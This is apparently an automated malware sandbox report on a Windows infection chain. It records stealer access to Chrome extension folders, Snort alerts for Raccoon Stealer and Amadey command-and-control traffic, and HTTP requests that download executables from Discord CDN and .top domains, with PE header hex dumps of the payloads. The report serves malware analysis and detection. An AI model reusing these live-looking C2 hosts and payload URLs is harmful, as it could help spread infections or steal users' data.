Source:	Binary string: c C:\rudiletama-43\bano.pdbp source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: C:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 20BD.exe, 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp
Source:	Binary string: wntdll.pdb source: 20BD.exe
Source:	Binary string: C:\rudiletama-43\bano.pdb source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: NC:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp

Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 4x nop then add dword ptr [ebp-5Ch], 01h	23_2_01140520
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 4x nop then jmp 0114100Dh	23_2_01140DD0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	23_2_011491D8
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	23_2_011491CC
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 4x nop then jmp 0114100Dh	23_2_01140DC0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49865 -> 91.219.236.97:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 185.215.113.45:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 185.215.113.45:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe	Domain query: znpst.top
Source: C:\Windows\explorer.exe	Network Connect: 216.128.137.31 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe	Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe	Domain query: hajezey1.top
Source: C:\Windows\explorer.exe	Domain query: sysaheu90.top

Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.97
Source: global traffic	HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: global traffic	HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:49:30 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:49:02 GMTETag: "54600-5cf8247e1cc68"Accept-Ranges: bytesContent-Length: 345600Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 8d a1 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c4 03 00 00 c4 70 02 00 00 00 00 d0 c9 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 cc b6 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 c8 03 00 50 00 00 00 00 60 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 be 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 48 c3 03 00 00 10 00 00 00 c4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 e0 03 00 00 16 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 6f 70 61 62 61 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 60 73 02 00 40 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 a0 73 02 00 24 01 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:50:10 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:50:02 GMTETag: "92a00-5cf824b80192b"Accept-Ranges: bytesContent-Length: 600576Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 82 db 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a8 07 00 00 c4 70 02 00 00 00 00 80 ad 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 9c b6 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 ab 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 38 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 a2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 a6 07 00 00 10 00 00 00 a8 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 69 77 65 72 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 c2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 80 77 02 00 24 01 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:50:40 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:50:44 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 18:50:02 GMTETag: "d6000-5cf824b7e7878"Accept-Ranges: bytesContent-Length: 876544Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 99 f0 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 de 0b 00 00 c4 70 02 00 00 00 00 a0 e2 09 00 00 10 00 00 00 f0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 7c 02 00 04 00 00 4c e6 0d 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 e0 0b 00 50 00 00 00 00 70 7b 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 7b 02 44 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 d7 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 dc 0b 00 00 10 00 00 00 de 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 f0 0b 00 00 16 00 00 00 e2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 77 6f 6d 75 78 e5 02 00 00 00 60 7b 02 00 04 00 00 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 70 7b 02 00 40 00 00 00 fc 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 b0 7b 02 00 24 01 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: unknown

HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49841 version: TLS 1.0

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jaqhuuufk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lhnqxhhk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: hajezey1.top
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uktwknfaq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fnyhcr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kejrjwxwy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wijjlglvpi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://chbebm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://foxbbmduqm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uneqpmoi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iakfv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hbocfb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xnalq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qflbfkys.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jyhduujjq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yetpvqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jkbenmco.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jpjsnfgtc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jkmns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jwvrimo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kfnisufi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xoynqlbjnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: hajezey1.top
